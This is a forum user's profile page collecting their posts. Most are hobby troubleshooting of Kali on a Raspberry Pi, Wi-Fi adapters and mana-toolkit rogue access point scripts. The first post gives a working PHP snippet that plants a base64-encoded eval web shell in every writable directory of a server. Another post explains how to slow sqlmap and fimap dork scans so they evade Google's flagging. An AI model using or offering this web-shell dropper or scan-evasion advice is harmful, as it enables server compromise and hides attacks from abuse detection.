Jump to content

i8igmac

Dedicated Members
  • Posts

    939
  • Joined

  • Last visited

  • Days Won

    22

Posts posted by i8igmac

  1. Ill provide some of my exciting automation :-p

    this little snipp will recursively scan directorys for writable permissions and then write a small shell...

    If you have php execution, phpinfo(); then try eval(codebelow);

    carefule, this may write a few thousand shells to ur hard drive :-)

    chdir('../');
    
    $path = realpath(getcwd());
    
    $objects = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path), RecursiveIteratorIterator::SELF_FIRST);
    
    foreach($objects as $name => $object){
    
            if (is_dir($name)) {
    
                    if (is_writable($name))  {
    
                            echo $name . ' ';
    
                            file_put_contents($name. '/tmp.php', base64_decode("PD9ldmFsKGJhc2U2NF9kZWNvZGUoJF9HRVRbY214eXpdKSk7Pz4="));
    
                    }
    
            }
    
    }
    
    
  2. Lots of tools use a google dork search queries.

    Sqlmap

    fimap

    if you send request to fast you will be flagged, if you send to many in a short amount of time you will be flagged...

    You have to understand how many did you send?

    Also the length of time?

    Then you must slow your scanning down to evade there flagging algorithm...

    inurl:.php?PAGE=index.html

    send this query threw your browser 20 times in a row and see what happens...

    Let me know how many queries untill your flagged

  3. http://images.offensive-security.com/1.0.9/kali-1.0.9-rpi.img.xz

    This is the proper download link... I have made the mistake of downloading the wrong image and then my pi just black screened after installed and boot...

    unxz is the tool I used for extraction... (I think)

    Installation is as simple as posted above...

    After your first successful boot, you may notice that your harddrive space IS Not 64gig, you will have to use a tool like gparted to resize the partition from a linux machine

  4. Take the proper precautions and take notes of all changes he makes... if these changes could cause security holes or a backdoor is installed...

    would be exciting if you caught him in the act...

    I'm no security pro... I would list all files recursively

    Modification dates could be logged and compared...

    Or list all files and grep threw each day he has access...

    ls -alR /var/www/root | grep $date

  5. i8igmac i like that beast of a machine, yea you can find some great deals on stuff when it goes EOL and the great thing is that it still has the MFG warranty even though you get a better deal on it. What Nvidia card is that btw and what size screen?

    geforce 560m... screen size is not at all small but im not sure of its size... i would love to upgraid look at all the new beastly options...

    cerealKiller:" Ill bet it looks crispy in the dark"

    zerocool:" Are you sure this thing is not going to waist"

    "maybe its to much machine for you"

  6. kv-cooling-fans.jpg

    kv-home-751-550.jpg

    Is price a problem? I picked up one of these display models at bestbuy for 900$ a few years ago.... absolutely love it...

    #1. Nvidia... 14000 pSk... wifi cracking machine...

    #2. Look at the vents on this machine. Overheat kills ALL... lost a few labtops already.

    #3. Cpu, ram, hd, its all performance machine... keys that glow was a must for me...

    When buying any new machine, don't get the best of the best....

    new machines take a little time for kali to work out of the box...

  7. I have a linux desktop with a default install squid3...

    Any one use squid as a caching proxy? Care to share your squid3.conf?

    a google search of 'squid3.conf pastebin' shows lots of examples.

    my goal is to help out raspbmc., my xbmc raspberry pi could maybe load from cache images and videos...

    it looks like squid can cache content by regex

    *.jpg

    *.mkv

    *.avi

    *.etc

  8. (Cisco m10 internet source)

    (Ddwrt repeater)

    (My devices, droid, desktop, labtop etc. Connected to repeater)

    So i have 2 issues I would like to resolve.

    Port forwarding. should I use repeater bridge? what I have tried, cisco forward to ddwrt then ddwrt forward to my desktop, but I get no response from online port scanners....

    This next issue is odd... all my machines connected to ddwrt threw wifi can not ping each other or use any services...

    my desktop is plugged into ddwrt by Ethernet, my other wifi associated machines can ping the desktop and use the services like ftp ssh etc...

  9. I found what's problem, we must use python2.6 instead python2.7. I don't know what's different, but now everything works!

    Thanks @i8igmac

    glad to see you up and runnung... what kind of wifi card? Are you using a powered usb hub?

    I would constantly watch /var/log/kern.log to try and identify any problems... do you have any usb disconnects?

    with full.sh running I have seen 24 hrs with know problem but noupstream.sh acts funny after a while I see dhcp fails to hand out ip (seems like to many clients will trigger this event)

  10. Apt-get install kali-linux-wireless

    this is a large install. it may cover some of the basic modules you may be missing. on my first boot up this was my first install

    then git clone worked with no errors during /mana/kali-install.sh

    There is also apt-get install mana-toolkit but you will be missing the bash scripts

    you can also search for the specific module through apt

  11. Edit... tail -f /var/log/kern.log helped me solve my problems... plug in and see what happens

    I went into bestbuy and started to compare prices vs amp output...

    15$ Usb hub 5v 2amp output is what I end up with...

    I can recommend a temp fix, but with out fully understanding your situation, my device would disconnect during heavy transfer after associated

    Iwconfig wlan0 rate 5.5M fixed

    This would fix my problem with other wifi cards,

  12. apt-cache search firmware... its there

    Tail -f /var/log/kernel

    Now plug the card in and post what u see... also what does iwconfig show... do you see wlan0?

  13. OmDxEz4.jpg

    http://i.imgur.com/xQuF9Fq.jpg

    http://i.imgur.com/RAtlIVl.jpg

    awus036nha

    v5 anker 15000 mah

    raspberry pi b+

    2 amp usb hub

    im at about 135$ so far (money i have made with tips during work hours)

    i had the pi plugged into 1amp and usb-hub+alfa-card plugged into 2 amp power supply and seems to run just fine... (fails other way around, alfa card needs 2 amps or disconnect/reconnect happens)

    the video above, i add this to my /etc/rc.local --> ./mana/run-mana/start-noupstream.sh

    with eth0 as the out interface, i have seen this thing go for 12 hours with out any dmesg errors... (./start-nat-simple.sh)

    i plan to get a nother alfa card for a good out interface...

    its ugly, at the moment, i plan to clean it up...

  14. This has been a plan of mine [not the infusion part] i like to do things in ruby...

    It will be so easy and fun... my plan is for use with a mobile raspberry pi kali install...

    I have 4 desktops at home and pyrit already has a simple cluster configuration

    this stuff is only a hobby to me so my time invested is minimal.

    1 machine benchmark is around 14000psk...

  15. 2 cards for testing
    wusb54g (does not suport master mode)
    AWUS036NHA (just got this card yesterday)
    kali 1.0.9 raspberry pi b+

    i have 2 cards for testing... ill start with airbase-ng as it will support both cards...

    upstream=eth0
    phy=wlan0
    
    service network-manager stop
    rfkill unblock wlan
    
    ifconfig $phy down
    iwconfig $phy mode monitor
    ifconfig $phy up
    iwconfig $phy rate 5.5M fixed
    airbase-ng $phy -c 6 -P -C 60&
    sleep 5
    ifconfig at0 10.0.0.1 netmask 255.255.255.0 up
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    
    dhcpd -cf /etc/mana-toolkit/dhcpd.conf at0
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    iptables --policy INPUT ACCEPT
    iptables --policy FORWARD ACCEPT
    iptables --policy OUTPUT ACCEPT
    iptables -F
    iptables -t nat -F
    iptables -t nat -A POSTROUTING -o $upstream -j MASQUERADE
    iptables -A FORWARD -i at0 -o $upstream -j ACCEPT

    so, you notice i have set rate to 5.5M fixed, from what i understand this will lighten the load (smaller chunks of data) with out this the usb device will dissconnect and reconnect do to (over-current)
    with out a lower fixed rate, a client will connect and when data is sent over that is to large you will then see over-current happen
    the script above works well with the old ugly wusb54g...

    so, i got my new alfa card and figured all should run with out a problem... after the alfa card is placed into monitor mode, this error shows when you attempt to set a fixed rate

    iwconfig wlan0 rate 5.5M fixed
    Sep 26 23:36:23 kali kernel: [ 5920.439195] ------------[ cut here ]------------
    Sep 26 23:36:23 kali kernel: [ 5920.461808] WARNING: CPU: 0 PID: 4729 at net/mac80211/driver-ops.h:12 ieee80211_set_bitrate_mask+0x138/0x144 [mac80211]()
    Sep 26 23:36:23 kali kernel: [ 5920.491352] wlan0:  Failed check-sdata-in-driver check, flags: 0x3
    Sep 26 23:36:23 kali kernel: [ 5920.511385] Modules linked in: rt73usb rt2x00usb rt2x00lib ipt_MASQUERADE iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack iptable_filter ip_tables x_tables tun ipv6 evdev joydev dm_mod arc4 snd_soc_pcm512x snd_soc_wm8804 ath9k_htc ath9k_common ath9k_hw ath mac80211 cfg80211 rfkill snd_soc_bcm2708_i2s regmap_mmio snd_soc_core snd_compress regmap_i2c snd_pcm_dmaengine regmap_spi snd_pcm snd_page_alloc snd_seq snd_seq_device snd_timer leds_gpio led_class snd spi_bcm2708 i2c_bcm2708
    Sep 26 23:36:23 kali kernel: [ 5920.586702] CPU: 0 PID: 4729 Comm: iwconfig Tainted: G        W    3.12.26 #1
    Sep 26 23:36:23 kali kernel: [ 5920.601828] [<c001450c>] (unwind_backtrace+0x0/0xec) from [<c00117f0>] (show_stack+0x10/0x14)
    Sep 26 23:36:23 kali kernel: [ 5920.619939] [<c00117f0>] (show_stack+0x10/0x14) from [<c001f98c>] (warn_slowpath_common+0x68/0x88)
    Sep 26 23:36:23 kali kernel: [ 5920.636405] [<c001f98c>] (warn_slowpath_common+0x68/0x88) from [<c001f9dc>] (warn_slowpath_fmt+0x30/0x40)
    Sep 26 23:36:23 kali kernel: [ 5920.655742] [<c001f9dc>] (warn_slowpath_fmt+0x30/0x40) from [<bf12cc48>] (ieee80211_set_bitrate_mask+0x138/0x144 [mac80211])
    Sep 26 23:36:23 kali kernel: [ 5920.677358] [<bf12cc48>] (ieee80211_set_bitrate_mask+0x138/0x144 [mac80211]) from [<bf0f3f9c>] (cfg80211_wext_siwrate+0x128/0x17c [cfg80211])
    Sep 26 23:36:23 kali kernel: [ 5920.699440] [<bf0f3f9c>] (cfg80211_wext_siwrate+0x128/0x17c [cfg80211]) from [<c0436f8c>] (ioctl_standard_call+0x60/0x474)
    Sep 26 23:36:23 kali kernel: [ 5920.718229] [<c0436f8c>] (ioctl_standard_call+0x60/0x474) from [<c0437538>] (wext_handle_ioctl+0x198/0x234)
    Sep 26 23:36:23 kali kernel: [ 5920.736694] [<c0437538>] (wext_handle_ioctl+0x198/0x234) from [<c03947c4>] (dev_ioctl+0x518/0x834)
    Sep 26 23:36:23 kali kernel: [ 5920.754231] [<c03947c4>] (dev_ioctl+0x518/0x834) from [<c00f6b88>] (do_vfs_ioctl+0x408/0x5f4)
    Sep 26 23:36:23 kali kernel: [ 5920.771443] [<c00f6b88>] (do_vfs_ioctl+0x408/0x5f4) from [<c00f6dac>] (SyS_ioctl+0x38/0x60)
    Sep 26 23:36:23 kali kernel: [ 5920.788322] [<c00f6dac>] (SyS_ioctl+0x38/0x60) from [<c000df80>] (ret_fast_syscall+0x0/0x30)
    Sep 26 23:36:23 kali kernel: [ 5920.806173] ---[ end trace dc57b6bd58a09bbf ]---
    [B]#dissconnect[/B]
    Sep 26 23:37:34 kali kernel: [ 5991.874808] hub 1-1:1.0: over-current change on port 2
    Sep 26 23:37:34 kali kernel: [ 5992.134019] usb 1-1.4: USB disconnect, device number 36
    Sep 26 23:37:35 kali kernel: [ 5992.981972] usb 1-1.4: ath9k_htc: USB layer deinitialized
    Sep 26 23:37:36 kali kernel: [ 5993.251477] usb 1-1.4: new high-speed USB device number 38 using dwc_otg
    Sep 26 23:37:36 kali kernel: [ 5993.382818] usb 1-1.4: New USB device found, idVendor=0cf3, idProduct=9271
    Sep 26 23:37:36 kali kernel: [ 5993.395969] usb 1-1.4: New USB device strings: Mfr=16, Product=32, SerialNumber=48
    Sep 26 23:37:36 kali kernel: [ 5993.410376] usb 1-1.4: Product: UB91C
    Sep 26 23:37:36 kali kernel: [ 5993.420526] usb 1-1.4: Manufacturer: ATHEROS
    Sep 26 23:37:36 kali kernel: [ 5993.431422] usb 1-1.4: SerialNumber: 12345
    Sep 26 23:37:36 kali kernel: [ 5993.453788] usb 1-1.4: ath9k_htc: Firmware htc_9271.fw requested
    Sep 26 23:37:36 kali kernel: [ 5993.478407] usb 1-1.2: USB disconnect, device number 33
    Sep 26 23:37:36 kali kernel: [ 5993.763553] usb 1-1.4: ath9k_htc: Transferred FW: htc_9271.fw, size: 51272
    Sep 26 23:37:36 kali kernel: [ 5993.901552] usb 1-1.2: new full-speed USB device number 39 using dwc_otg
    Sep 26 23:37:36 kali kernel: [ 5994.008737] ath9k_htc 1-1.4:1.0: ath9k_htc: HTC initialized with 33 credits
    Sep 26 23:37:36 kali kernel: [ 5994.028620] usb 1-1.2: New USB device found, idVendor=046d, idProduct=c52b
    Sep 26 23:37:36 kali kernel: [ 5994.043904] usb 1-1.2: New USB device strings: Mfr=1, Product=2, SerialNumber=0
    Sep 26 23:37:36 kali kernel: [ 5994.058656] usb 1-1.2: Product: USB Receiver
    Sep 26 23:37:36 kali kernel: [ 5994.070618] usb 1-1.2: Manufacturer: Logitech
    Sep 26 23:37:36 kali kernel: [ 5994.110763] input: Logitech USB Receiver as /devices/platform/bcm2708_usb/usb1/1-1/1-1.2/1-1.2:1.0/input/input20
    Sep 26 23:37:36 kali kernel: [ 5994.139661] hid-generic 0003:046D:C52B.001F: input,hidraw0: USB HID v1.11 Keyboard [Logitech USB Receiver] on usb-bcm2708_usb-1.2/input0
    Sep 26 23:37:37 kali kernel: [ 5994.213364] input: Logitech USB Receiver as /devices/platform/bcm2708_usb/usb1/1-1/1-1.2/1-1.2:1.1/input/input21
    Sep 26 23:37:37 kali kernel: [ 5994.249399] hid-generic 0003:046D:C52B.0020: input,hiddev0,hidraw1: USB HID v1.11 Mouse [Logitech USB Receiver] on usb-bcm2708_usb-1.2/input1
    Sep 26 23:37:37 kali kernel: [ 5994.301784] hid-generic 0003:046D:C52B.0021: hiddev0,hidraw2: USB HID v1.11 Device [Logitech USB Receiver] on usb-bcm2708_usb-1.2/input2
    Sep 26 23:37:37 kali kernel: [ 5994.571029] ath9k_htc 1-1.4:1.0: ath9k_htc: FW Version: 1.3
    Sep 26 23:37:37 kali kernel: [ 5994.591476] ath: EEPROM regdomain: 0x833a
    Sep 26 23:37:37 kali kernel: [ 5994.591541] ath: EEPROM indicates we should expect a country code
    Sep 26 23:37:37 kali kernel: [ 5994.591570] ath: doing EEPROM country->regdmn map search
    Sep 26 23:37:37 kali kernel: [ 5994.591583] ath: country maps to regdmn code: 0x37
    Sep 26 23:37:37 kali kernel: [ 5994.591627] ath: Country alpha2 being used: GB
    Sep 26 23:37:37 kali kernel: [ 5994.591641] ath: Regpair used: 0x37
    Sep 26 23:37:37 kali kernel: [ 5994.608663] ieee80211 phy24: Atheros AR9271 Rev:1


    with out lowering the rate. a client connects and when large data passes threw almost instatly the device is disconnected.

    So now since my new card suports master mode i get to test hostapd ,-) but almost the same symptoms exist

    /root/projects/mana/run-mana/start-nat-simple.sh

    ./start-nat-simple.sh

    So, the thing is up and running, the symptom is almost the same as i explain with airbase...
    my phone connects to this new access point, if i quickly refresh a webpage data begins to pass threw, i must click quickly or else dissconnect and reconnect happens with this slightly new error
    ath: phy24: Failed to wakeup in 500us

    Sep 26 23:50:10 kali kernel: [ 6747.690006] usb 1-1.4: USB disconnect, device number 38
    Sep 26 23:50:11 kali kernel: [ 6748.954770] ath: phy24: Failed to wakeup in 500us
    Sep 26 23:50:11 kali kernel: [ 6748.975230] ath: phy24: Failed to wakeup in 500us
    Sep 26 23:50:11 kali kernel: [ 6749.112046] usb 1-1.4: ath9k_htc: USB layer deinitialized
    Sep 26 23:50:12 kali kernel: [ 6749.391495] usb 1-1.4: new high-speed USB device number 40 using dwc_otg
    Sep 26 23:50:12 kali kernel: [ 6749.522866] usb 1-1.4: New USB device found, idVendor=0cf3, idProduct=9271
    Sep 26 23:50:12 kali kernel: [ 6749.535101] usb 1-1.4: New USB device strings: Mfr=16, Product=32, SerialNumber=48
    Sep 26 23:50:12 kali kernel: [ 6749.548526] usb 1-1.4: Product: UB91C
    Sep 26 23:50:12 kali kernel: [ 6749.557935] usb 1-1.4: Manufacturer: ATHEROS
    Sep 26 23:50:12 kali kernel: [ 6749.567854] usb 1-1.4: SerialNumber: 12345
    Sep 26 23:50:12 kali kernel: [ 6749.592176] usb 1-1.4: ath9k_htc: Firmware htc_9271.fw requested
    Sep 26 23:50:12 kali kernel: [ 6749.899058] usb 1-1.4: ath9k_htc: Transferred FW: htc_9271.fw, size: 51272
    Sep 26 23:50:12 kali kernel: [ 6750.144463] ath9k_htc 1-1.4:1.0: ath9k_htc: HTC initialized with 33 credits
    Sep 26 23:50:13 kali kernel: [ 6750.583687] ath9k_htc 1-1.4:1.0: ath9k_htc: FW Version: 1.3
    Sep 26 23:50:13 kali kernel: [ 6750.594294] ath: EEPROM regdomain: 0x833a
    Sep 26 23:50:13 kali kernel: [ 6750.594374] ath: EEPROM indicates we should expect a country code
    Sep 26 23:50:13 kali kernel: [ 6750.594405] ath: doing EEPROM country->regdmn map search
    Sep 26 23:50:13 kali kernel: [ 6750.594418] ath: country maps to regdmn code: 0x37
    Sep 26 23:50:13 kali kernel: [ 6750.594463] ath: Country alpha2 being used: GB
    Sep 26 23:50:13 kali kernel: [ 6750.594478] ath: Regpair used: 0x37
    Sep 26 23:50:13 kali kernel: [ 6750.616382] ieee80211 phy25: Atheros AR9271 Rev:1


    can this wakeup script be disabled?
  16. I did not watch the episode. But I will try to provide a quick set of instructions.

    once you have Wireshark up and running and you see data flowing, you can filter out specific traffic... http example

    try clicking on a specific packet, the bottom window you will see IP address and other specific information that you can filter through,in this window it's like a drop down menu continue to drop down until you find a specific string that you would like to filter. right click on the IP address and apply as filter, you can also right click the port number and click OR AND NOT SELECT

    using this right click method you can learn the filtering language. you could copy this string and paste into the command line with other applications

×
×
  • Create New...